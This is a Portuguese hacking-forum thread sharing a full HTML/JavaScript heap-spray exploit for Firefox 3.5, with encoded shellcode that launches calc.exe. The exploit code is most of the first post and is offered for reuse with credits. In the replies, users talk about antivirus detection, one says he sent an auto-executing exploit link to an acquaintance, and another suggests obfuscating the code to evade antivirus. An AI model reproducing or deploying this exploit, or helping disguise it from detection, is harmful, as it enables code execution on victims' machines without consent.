Unconfigured Ad Widget

Collapse

Anúncio

Collapse
No announcement yet.

[Exploit] Buffer Overflow em Firefox e Mantra 3.5

Collapse
X
Collapse
 
  • Page of 1
  • Filter
  • Tempo
  • Show
Clear All
new posts
Anterior template Avançar
  • Font Size
    #1

    [Exploit] Buffer Overflow em Firefox e Mantra 3.5

    O código abaixo, se salvo como HTML e acessado pelo FireFox 3.5 ou Mantra Security Toolkit na mesma versão (e outros navegadores baseados em FF), gera um estouro de pilha, fazendo aparecer aquela famosa janelinha do "Mozilla Crash Reporter".
    Código HTML:
    <html>
<head>
<title>Firefox 3.5 Vulnerability</title>
Firefox 3.5 Heap Spray Vulnerabilty
</br>
Author: SBerry aka Simon Berry-Byrne - Posted by 0KaL
</br>
Thanks to HD Moore for the insight and Metasploit for the payload
<div id="content">
<p>
<FONT>                           
</FONT>
</p>
<p>
<FONT>Loremipsumdoloregkuw</FONT></p>
<p>
<FONT>Loremipsumdoloregkuwiert</FONT>
</p>
<p>
<FONT>Loremikdkw  </FONT>
</p>
</div>
<script language=JavaScript>
 
/* Calc.exe */
var shellcode = unescape("%uE860%u0000%u0000%u815D%u06ED%u0000%u8A00%u1285%u0001%u0800" + 
                      "%u75C0%uFE0F%u1285%u0001%uE800%u001A%u0000%uC009%u1074%u0A6A" + 
                      "%u858D%u0114%u0000%uFF50%u0695%u0001%u6100%uC031%uC489%uC350" + 
                      "%u8D60%u02BD%u0001%u3100%uB0C0%u6430%u008B%u408B%u8B0C%u1C40" + 
                      "%u008B%u408B%uFC08%uC689%u3F83%u7400%uFF0F%u5637%u33E8%u0000" + 
                      "%u0900%u74C0%uAB2B%uECEB%uC783%u8304%u003F%u1774%uF889%u5040" + 
                      "%u95FF%u0102%u0000%uC009%u1274%uC689%uB60F%u0107%uEBC7%u31CD" + 
                      "%u40C0%u4489%u1C24%uC361%uC031%uF6EB%u8B60%u2444%u0324%u3C40" + 
                      "%u408D%u8D18%u6040%u388B%uFF09%u5274%u7C03%u2424%u4F8B%u8B18" + 
                      "%u205F%u5C03%u2424%u49FC%u407C%u348B%u038B%u2474%u3124%u99C0" + 
                      "%u08AC%u74C0%uC107%u07C2%uC201%uF4EB%u543B%u2824%uE175%u578B" + 
                      "%u0324%u2454%u0F24%u04B7%uC14A%u02E0%u578B%u031C%u2454%u8B24" + 
                      "%u1004%u4403%u2424%u4489%u1C24%uC261%u0008%uC031%uF4EB%uFFC9" + 
                      "%u10DF%u9231%uE8BF%u0000%u0000%u0000%u0000%u9000%u6163%u636C" + 
                      "%u652E%u6578%u9000");
/* Heap Spray Code */           
oneblock = unescape("%u0c0c%u0c0c");
var fullblock = oneblock;
while (fullblock.length<0x60000) 
{
    fullblock += fullblock;
}
sprayContainer = new Array();
for (i=0; i<600; i++) 
{
    sprayContainer[i] = fullblock + shellcode;
}
var searchArray = new Array()
 
function escapeData(data)
{
 var i;
 var c;
 var escData='';
 for(i=0;i<data.length;i++)
  {
  c=data.charAt(i);
  if(c=='&' || c=='?' || c=='=' || c=='%' || c==' ') c = escape(c);
  escData+=c;
  }
 return escData;
}
 
function DataTranslator(){
    searchArray = new Array();
    searchArray[0] = new Array();
    searchArray[0]["str"] = "blah";
    var newElement = document.getElementById("content")
    if (document.getElementsByTagName) {
        var i=0;
        pTags = newElement.getElementsByTagName("p")
        if (pTags.length > 0) 
        while (i<pTags.length)
        {
            oTags = pTags[i].getElementsByTagName("font")
            searchArray[i+1] = new Array()
            if (oTags[0]) 
            {
                searchArray[i+1]["str"] = oTags[0].innerHTML;
            }
            i++
        }
    }
}
 
function GenerateHTML()
{
    var html = "";
    for (i=1;i<searchArray.length;i++)
    {
        html += escapeData(searchArray[i]["str"])
    }   
}
DataTranslator();
GenerateHTML()
</script>
</body>
</html>
<html><body></body></html>
    Brinquem direito !!!
    Até a próxima!
    Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



    Notify-list · Twitter · Blog

    Nova lei: Invadir computadores protegidos é crime.
    Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)
    Tags: browser, explorador, falha, navegador, vulnerabilidade
    • Top
  • Font Size
    #2
    Salvei como txt deu nada, quando salvei em .html meu anti virus gritou KKKKK

    sigpic

    "Conhecimento não é crime, crime é o que você faz com ele."
    "Nunca deixe te dizer que você não é capaz"
    "Vocês podem me acorrentar, torturar e até destruir meu corpo, mas nunca aprisionaram minha mente"



    Full Access Defacer


    e-mail & msn: warlockowned@yahoo.com.br


    • Top

    Comment

    • Font Size
      #3
      É normal isso acontecer msm uashuashaushuas
      O pior é que o antivírus trata tudo vírus neh...

      Tava agora mesmo criando um link autoexecutável, na hora que passei pra mina o antivírus dela detecto o exploit e acuso vírus
      Agora ela tá me difamando...
      Quanto mais aprendo mais vejo o tamanho da minha ignorânica.
      sigpic
      • Top

      Comment

      • Font Size
        #4
        Tenho uma duvida :P
        Ele é um remote crash ou buffer overflow realmente?
        Está com cara de BoF mesmo
        Twitter: @samukt << Siga me ;D
        • Top

        Comment

        • Font Size
          #5
          Meu antivírus também gritou. Tentei salvar em TXT e gritou também! Kaspersky Internet Security é f....
          Mas já tentou criptografar (daqueles jeitos com JS)? Ele não detecta (eu acho), mas não sei se funciona.
          Este material pode ser compartilhado, desde que os devidos créditos sejam dados.



          Notify-list · Twitter · Blog

          Nova lei: Invadir computadores protegidos é crime.
          Lógica: Se eu invadi, não é protegido. Logo, não é crime :-)
          • Top

          Comment

          Anterior template Avançar
          X
          Working...
          X